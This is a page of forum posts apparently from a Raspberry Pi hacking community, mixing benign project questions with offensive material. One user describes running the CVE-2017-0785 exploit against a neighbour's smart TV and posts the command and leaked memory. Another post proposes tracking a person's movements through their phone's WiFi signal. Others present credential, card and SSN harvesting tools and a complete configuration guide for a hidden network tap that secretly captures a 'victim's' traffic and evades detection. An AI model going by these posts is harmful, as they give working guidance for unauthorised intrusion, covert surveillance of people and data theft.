Search the Community

Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│ 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│ 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p│····│·`a8│ 00000050 b5 60 61 38 b5 69 39 70 b5 69 39 64 b5 69 5a a4 │·`a8│·i9p│·i9d│·iZ·│ 00000060 b4 8f e9 f8 00 00 00 00 b5 69 5a a4 00 00 00 41 │····│····│·iZ·│···A│ 00000070 b4 8f eb 84 b5 54 e6 f9 b5 60 61 38 b5 69 41 78 │····│·T··│·`a8│·iAx│ 00000080 b4 8f ea 08 b5 56 e0 4f b4 8f ea 10 b5 54 57 fd │····│·V·O│····│·TW·│ 00000090 00 00 00 00 b5 69 41 60 b5 56 79 59 b5 69 39 64 │····│·iA`│·VyY│·i9d│ 000000a0 b4 8f ea 30 00 00 00 18 b4 8f ea d0 b5 54 ca c3 │···0│····│····│·T··│ 000000b0 b5 69 41 60 00 00 00 05 b5 60 61 38 b4 8f ea 58 │·iA`│····│·`a8│···X│ 000000c0 00 00 00 18 b4 8f ea d0 b5 69 39 64 b5 54 d2 bf │····│····│·i9d│·T··│ 000000d0 00 00 00 00 b4 30 04 90 00 00 00 00 42 27 e0 00 │····│·0··│····│B'··│ 000000e0 00 00 00 00 b5 69 39 64 00 00 00 08 00 00 00 01 │····│·i9d│····│····│ 000000f0 b4 30 04 90 b4 8f ea d0 00 00 00 41 b5 69 39 64 │·0··│····│···A│·i9d│ 00000100 b4 8f ea a8 b5 69 41 60 00 00 00 03 b5 69 39 64 │····│·iA`│····│·i9d│ 00000110 b5 60 61 38 b4 30 c8 d8 b4 8f ea a0 b5 56 e0 4f │·`a8│·0··│····│·V·O│ 00000120 b4 8f ea a8 b5 56 f6 21 b4 30 c8 d8 41 02 6f 10 │····│·V·!│·0··│A·o·│ 00000130 b4 8f ea b8 b5 50 a1 b7 21 00 00 14 0e 0a 24 00 │····│·P··│!···│··$·│ 00000140 b5 60 61 38 b5 69 ab 60 b4 8f ea d0 b5 56 e0 4f │·`a8│·i·`│····│·V·O│ 00000150 b4 8f ea d8 b5 69 ab 58 b3 6d d4 87 00 00 00 00 │····│·i·X│·m··│····│ 00000160 b4 8f ea f8 00 00 00 02 00 00 00 10 b3 6d f4 b0 │····│····│····│·m··│ 00000170 b5 60 61 38 b5 56 d2 45 b4 8f eb 10 00 00 00 00 │·`a8│·V·E│····│····│ 00000180 b5 69 5a a4 00 00 00 41 00 00 00 13 b5 54 e6 f9 │·iZ·│···A│····│·T··│ 00000190 b4 8f ed 24 b5 69 41 60 b5 60 61 38 b4 8f eb 30 │···$│·iA`│·`a8│···0│ 000001a0 00 00 00 19 b4 8f ed 24 00 00 00 41 b5 54 9f 4b │····│···$│···A│·T·K│ 000001b0 00 00 00 00 b5 69 41 60 b5 60 61 38 00 00 00 64 │····│·iA`│·`a8│···d│ 000001c0 b4 8f eb 48 b5 56 e0 4f b4 8f eb 50 b5 56 ef 31 │···H│·V·O│···P│·V·1│ 000001d0 b5 60 61 38 b5 69 ab 60 b5 60 61 38 b5 69 ab 60 │·`a8│·i·`│·`a8│·i·`│ 000001e0 b4 8f eb 68 b5 56 e0 4f b4 8f eb 70 b5 54 57 fd │···h│·V·O│···p│·TW·│ 000001f0 b5 69 ab 58 b4 8f ed 24 00 00 00 41 b5 69 ab 10 │·i·X│···$│···A│·i··│ 00000200 b4 8f eb 90 00 00 00 0f b4 8f ed 24 b5 56 82 8b │····│····│···$│·V··│ 00000210 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000220 b5 60 61 38 b5 60 61 38 b3 6e 95 b8 00 00 00 41 │·`a8│·`a8│·n··│···A│ 00000230 b4 8f eb c8 00 00 00 41 b3 6e 95 b8 b5 60 61 38 │····│···A│·n··│·`a8│ 00000240 b3 6e b5 f0 b5 56 79 25 b5 56 78 bd b5 69 41 60 │·n··│·Vy%│·Vx·│·iA`│ 00000250 b5 69 39 64 00 00 00 14 b4 8f eb e0 b5 54 cd db │·i9d│····│····│·T··│ 00000260 b5 56 79 59 b5 69 39 64 b4 8f eb f0 b5 54 c9 f5 │·VyY│·i9d│····│·T··│ 00000270 b5 69 41 60 b5 69 41 60 00 00 00 06 b5 60 61 38 │·iA`│·iA`│····│·`a8│ 00000280 b4 8f ec 18 00 00 00 14 b3 6e f6 60 b5 54 d2 13 │····│····│·n·`│·T··│ 00000290 b5 54 da cd b5 69 41 60 00 00 00 00 b5 69 39 64 │·T··│·iA`│····│·i9d│ 000002a0 b4 8f ec 38 00 00 00 00 00 00 00 00 b5 60 00 00 │···8│····│····│·`··│ 000002b0 b5 60 61 38 b3 6f 16 a0 00 00 00 41 00 00 00 0f │·`a8│·o··│···A│····│ 000002c0 b4 8f ec 68 00 00 00 0f b3 6f 16 a8 b5 60 61 38 │···h│····│·o··│·`a8│ 000002d0 b3 6f 36 d0 b5 54 6e 5d 00 00 00 00 ff ff ff ff │·o6·│·Tn]│····│····│ 000002e0 00 00 00 00 b5 68 13 71 00 00 00 0c b5 69 39 70 │····│·h·q│····│·i9p│ 000002f0 00 00 00 0e b5 5d 62 84 b5 5d 62 c0 b5 5d 62 e0 │····│·]b·│·]b·│·]b·│ 00000300 b5 5d 63 10 b5 5d 63 3c b5 5d 63 68 00 00 00 41 │·]c·│·]c<│·]ch│···A│ 00000310 b3 6c 82 1c 00 00 00 01 00 00 00 00 b3 6c 82 36 │·l··│····│····│·l·6│ 00000320 b4 8f ed 24 00 00 00 41 b3 6c 82 36 00 00 00 00 │···$│···A│·l·6│····│ 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000340 00 00 00 00 b5 60 61 38 b5 60 61 38 b5 69 39 70 │····│·`a8│·`a8│·i9p│ 00000350 b5 69 39 64 b5 69 5a a4 b4 8f ec f0 00 00 00 00 │·i9d│·iZ·│····│····│ 00000360 b5 69 5a a4 b4 31 15 07 b5 69 39 70 b5 54 e6 f9 │·iZ·│·1··│·i9p│·T··│ 00000370 b5 69 39 64 00 00 00 02 b5 69 5a a4 b4 8f ed 20 │·i9d│····│·iZ·│··· │ 00000380 b4 31 15 07 00 00 00 0c b4 31 15 07 b5 54 ea 59 │·1··│····│·1··│·T·Y│ 00000390 00 00 00 00 00 00 00 00 00 00 00 00 41 02 6f 10 │····│····│····│A·o·│ 000003a0 b5 5d 88 94 b5 5d 88 5c b4 8f f8 f0 b5 69 f7 20 │·]··│·]·\│····│·i· │ 000003b0 00 00 02 e9 42 2b d0 10 00 00 01 74 00 00 00 00 │····│B+··│···t│····│ 000003c0 b4 8f ed 58 00 00 00 00 b4 8f ed 50 00 00 00 81 │···X│····│···P│····│ 000003d0 42 2b cc 60 b4 8f ed 60 00 00 00 00 00 00 00 00 │B+·`│···`│····│····│ 000003e0 00 00 00 00 b5 69 f7 20 b5 69 f6 d4 00 00 00 00 │····│·i· │·i··│····│ 000003f0 b4 8f ed 78 b5 69 f6 b0 00 00 00 00 00 00 ff ff │···x│·i··│····│····│ 00000400 b4 8f ed 98 b4 8f ed 90 b4 8f f8 f0 0e 0a 24 00 │····│····│····│··$·│ 00000410 b4 8f ed 98 │····││ 00000414 Who knows what to do now with this Code?

Does anyone have any fun Raspberry Pi or Pi zero projects they recommend? i have a few of each laying around looking for new Ideas

Hi all, I was recently talking with someone regarding Private Investigator work, and the discussion included ways in which one could tell which direction a tailed vehicle/person had turned when you get to a junction and are not certain whether they turned left or right etc. This has given me an idea regarding using the Station MAC of their mobile phone to determine which direction they went. Kind of like a poor-mans GSM Directional Finder, but using the target's WiFi signal instead of the actual phone signal. I would like your thoughts on the following, whether you think this would be feasible, and possible best methods if it is. Minimum 2 x directional WiFi antennas in the PI vehicle, one facing forwards and left, one facing forwards and right. Beam widths set so that they are close to each other, but not actually crossing, at the front of the vehicle. A device (RPi / laptop) with both antennas connected. Both antennas in Monitor Mode, using airodump-ng to monitor nearby Station MACs. A script created on the device to read which antenna is picking up a Station MAC with a higher signal strength than the other, and then output this to a screen / phone. Now, presuming the PI is able to get the mobile phone Station MAC of the person being investigated (not massively difficult) and the target has their phone WiFi on (happens often), in theory this method could make following them easier, as even without obvious sight of the vehicle/person ahead, the PI could have at least a rough idea of which direction they are in, in relation to their current position. It could perhaps also be possible to add more antennas, such as in each corner of the vehicle. Would this work? I'm tempted to have a play. Thanks.

Hi all, A relative is a farmer and has a Raspberry Pi set up in a field, that monitors various stuff. He would like to be able to connect to the RPi from the farmhouse, rather than travel down to the field just to get the data from it. The distance is around 1.5 miles from farmhouse to RPi, with a fairly clear line-of-sight (a few sparse trees and potentially the very edge of someone's house). What would be the best way to connect to it? I've considered using a 3G dongle on the RPi and using SSH over the net, or bridging the 2 with a Yagi on each end (pointed at each other). But which would be best, or something else? I have to consider power requirements as well, as at the moment the RPi doesn't take much (it's battery can last a good few days), but I don't want connecting extra equipment to it to make it last much less. *edit* I also found this; https://www.cooking-hacks.com/sx1272-lora-shield-for-raspberry-pi-868-mhz Any good? Also, I'm techie-minded, but haven't connected to an RPi using any of these methods before, so any links to tutorials or instructions on how one would go about this would be great. Thank you for your time.

Hi All! I'm currently busy with a project in witch i want to use man in the middle attacks to show the vulnerabilities of networking and explicitly phones who automatically connect to a known wifi network. I'm doing this for a school graduation project at an art school in the Netherlands, so i'm not an expert at hacking but i have a bit of experience programming. I want to use this tread to showcase the work i'm going to do, and to gather feedback from people (you boys and girls) far more experienced then me! So, my planning thus far is to set up an development/ possible final set up that can do MITM attacks and output this in an graphical way. I would like to use a raspberry PI 2B to be the graphical output device and host device for sharing the network with the wifi pineapple. The most reliable solution for that would be (i'm guessing) to share the internet from the raspberry to the pineapple trough a serial interface. What do you think of this set up? Would you share the internet in the same way or chose different hardware altogether? At the moment i'm testing wat i can get out of the pineapple in terms of data, i'm very interested in wat way i can best collect this data flowing trough the device. I've done some test with DNS spoofing what is working pretty decent. Also with Ettercap, TCPDump and SSLStrip. But i noticed that when i use Ettercap or SSLStrip the victim has a very slow connection, could this be because in my test set up i'm using the pineapple in client mode connected to another wifi? In the end i would like to intercept traffic that confronts the viewer, i don't want to show them there password but maybe scrambled pieces of written text like email, instant messaging usernames etc. I don't want to bluntly show all there data on a screen, and i also don't want to permanently store the data to do harm later on. Do you have tips on what are the best techniques to do this sort of data collecting and is it even possible to read the contents of a packet? I hope you could give me some feedback and direction! Many Thanks!

hi im working on a rig to use on my security demonstrations without having to drag my laptop to every customer... my thaugths are: Internett -> pineapple wlan1 pineapple wlan0 -> phone pineapple eth0 T V Raspberry pi eth0 So i want to ssh from my phone to the raspberry running linux... This is possible because eth0 and wlan0 by deafult is bridged.. So hurray!... Problem is from there... If i set up a honeypot i cant get internet from wlan1... It only provides internet to wlan0... I could connect the rasoberry trough my wirelescard and in on the wlan0 but its awfully inconvineent, and does only solve the problems of using updates, metaploit, nmap and so on.... What i need is a way to get the wlan1 to share its connectin to eth0 and at the same time be able to ssh to the rasberry pi... Anyone have a sugestion, ore have done this in the past?...

Hey everyone! Shadowblade72 and I are proud to present a project we've been working on for months; Hax0rBl0x! This framework is designed to have a central menu that allows you to pick and choose which attacks you want to use in a pentest. These tools are also being designed to function on Backtrack 5 R3 for use with a computer, or for use on a (Pi)neapple attack platform. We also want the ability to add new tools as we produce them. We will be updating this thread from time to time to announce new updates and new capabilities. If you guys have any suggestions, requests, bugs, or anything else, please let us know. List of tools: -Hax0rBl0x.sh: This is the main menu framwork that allows us to add more tools by simply dragging and dropping files. -Passive OS Fingerprinting: This is a passive scanner that will read information from passing packets to find OS, Browsers, Apps, Open Ports, uptime, Host type, and manufacturer of each host on the network (or on your pineapple) -Cred Harvester (Now with Arpspoofing built in!): This is a tool similar to Easy-Creds or YAMAS, but extremely polished to harvest creds, cookies, social security numbers, or credit card numbers from selected targets. The info is then displayed on an easy to read summary on screen and dumped into an easy to read report for further perusing. The programs launched are Ettercap, SSLStrip, Dsniff, Hamster & Ferret, NGREP, and URLSnarf. The link to our code can be found at: http://code.google.com/p/hax0rbl0x/ NOTE: We are still working on getting the install code working properly as we just switched to Google Projects, so stay tuned!\\ EDIT 2/21/2013: A couple of things. We've gotten Google Code working nicely and are working on getting a streamlined install working properly. also, this tool set has been tested on both BackTrack 5 R3 and the Pi. We make no promises that it will function at all on the pineapple itself.

I was watching the router episode and was wondering about doing the same thing with a raspberry pi. I figured i could install a usb nic and a usb wifi dongle. possibly also hooking up a powered usb hub and adding a hard drive I also didn't understand what the issue was that Darren had with making his router an access point. I am over all just wondering what the thoughts and concerns for doing this. would the 512 ram and 700 mhz processor be good enough for the performance they were trying to create in the episode?

The Interceptor has long been kind of a dead project. It makes sense too. The fon+, the hardware Robin Wood originally wrote his interceptor code for is way past EOL, hard to find, and under-featured given the current landscape of embedded/SOC offerings. By borrowing some of irongeek's raspberry pi recipes, and adding in some pi-point, I was able to get very similar functionality out of my raspberry pi. Heres how. Hardware: Raspberry Pi Model B 32GB SD Card Belkin 4 port powered USB hub Alfa wifi card (NHA, from the hakshop) USB Ethernet adapter (also from the hakshop) OS: Latest image of rasbian Software: All can be apt-get installed bridge-utils tcpdump hostapd fkill hostapd zd1211-firmware hostap-utils iw dnsmasq Edit /etc/network/interfaces to look like this: auto lo iface lo inet loopback iface eth0 inet dhcp iface wlan0 inet static address 192.168.0.1 netmask 255.255.255.0 Edit /etc/dnsmasq.conf # Never forward plain names (without a dot or domain part) domain-needed # Only listen for DHCP on wlan0 interface=wlan0 # Create a dhcp range on your /24 wlan0 network with 12 hour lease time dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h Edit /etc/hostapd/hostapd.conf (notice it is wpa with the preshared key at /etc/hostapd-psk - the ssid is also hidden) interface=wlan0 driver=nl80211 ssid=monkey channel=1 auth_algs=1 wpa=1 wpa_psk_file=/etc/hostapd-psk wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP TKIP rsn_pairwise=CCMP ignore_broadcast_ssid=1 Next Create/edit /etc/hostapd-psk 00:00:00:00:00:00 YourSuperLongAndSecurePasswd We're all set! Below you'll see my script for the intercepting portion of the monkey. Feel free to put it in /etc/rc.local to make it run on boot up. #!/bin/bash #Change settings below to match network eth_ip="192.168.1.199" eth_netmask="255.255.255.0" eth_broadcast="192.168.1.255" brctl addbr mybridge brctl addif mybridge eth0 brctl addif mybridge eth1 ifconfig eth0 0.0.0.0 promisc up ifconfig eth1 0.0.0.0 promisc up ifconfig mybridge promisc up ifconfig mybridge $eth_ip netmask $eth_netmask broadcast $eth_broadcast tcpdump -i eth1 -w /root/cap.pcap &amp; And here is my script for the wifi access point portion of the monkey, again you can put it in rc.local # turn on forwarding echo 1 &gt; /proc/sys/net/ipv4/ip_forward # enable NAT iptables -t nat -A POSTROUTING -j MASQUERADE # start the access point hostapd -B /etc/hostapd/hostapd.conf Now you're passing along all wired traffic to and from your wired victim, all whilst capturing every packet that goes by. You can then surreptitiously nab the pcap via the hidden wifi AP. What it doesn't do: Unlike the interceptor, it doesn't clone the traffic and pipe it over wifi and/or vpn. It merely captures the traffic and stores it for later retrieval. This was necessary with the original fon+, because there was no usb port, and only a dozen or so MB of storage. Now with USB and storage cheaper than ever, you can store days/weeks/months of captures if you want. Things to add: -Cronjob that will only turn on the wifi at certain times such as after business hours. That way no employee who happens to be chilling with airodump-ng running notices anything odd. -Cronjob that changes the wifi card from master mode to managed and connects to a wifi access point as a client to securely send the cap files. In doing so you could also send an email/upload a status file. -Add Jasegar functionality to the wifi AP (this ones the biggy) -Add the all important sslstrip functionality (something I've tried but can't get to work - if theres interest, I'll happily share my findings) -Add in Moriarty's awesome new UWUI So thats it! I've been testing this for the last several hours and it works great. Hope you guys find this interesting enough to give it a try yourself and post your experience here. Long live the interceptor monkey! telot

Hi everyone, PwnPi 3.0 The Pen Test Drop Box distro for the Raspberry Pi has been released! Now packing 200+ pentest tools and added easy setup of reverse connections. PwnPi Website : http://pwnpi.net/ SourceForge page : http://sourceforge.net/projects/pwnpi/ Screenshot 1 : http://s16.postimage...088ud/image.png Screenshot 2 : http://s10.postimage...xui2h/image.png Screenshot 3 : http://s16.postimage...p7bgl/image.png Direct Download : http://sourceforge.n...img.7z/download md5:5d0f146557def874b34ba0a5568d6c32:pwnpi-3.0.img.7z username:password:root:toor Let me know if you have any questions. Reflex!